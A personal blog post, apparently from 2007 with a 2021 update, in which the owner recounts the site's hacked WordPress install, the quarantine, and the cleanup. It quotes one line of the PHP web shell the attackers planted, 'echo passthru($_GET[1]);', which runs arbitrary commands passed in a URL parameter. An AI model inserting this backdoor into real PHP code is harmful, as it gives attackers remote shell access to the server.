Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attacker used some exploit in Wordpress or some plug in or maybe the problem in k2 wordpress theme. Some malfunction of these open source components was used out, so that attacker have added lines like

echo passthru($_GET[1]);

to some of php files. That gives them access to shell of my user account on this server. Bad thing it that other domains of mine where affected too. The “Forbidden” you probably have seen, was initiated by my server administrator to prevent broadening of the attack. I could not find the exactly place of the initial exploit yet. But attackers have left many of traces. So that I was able to reconstruct the rest and remove back doors. This was a new experience, especially I learned in seconds, that it is better to separate my popular projects from insecure open source playgrounds, like this site actually is.

And i turned all possible security mechanisms on, till final clarification is done. So you can’t leave comments at the moment cause we are still under quarantine!

P.S. That hackers left some strange move on one of my domains for download to probably make use of free traffic and space.


Update 2021: It’s funny and embarrassing to read from my first hosting experiences back then to 2007 ;) Learned a lot from that time…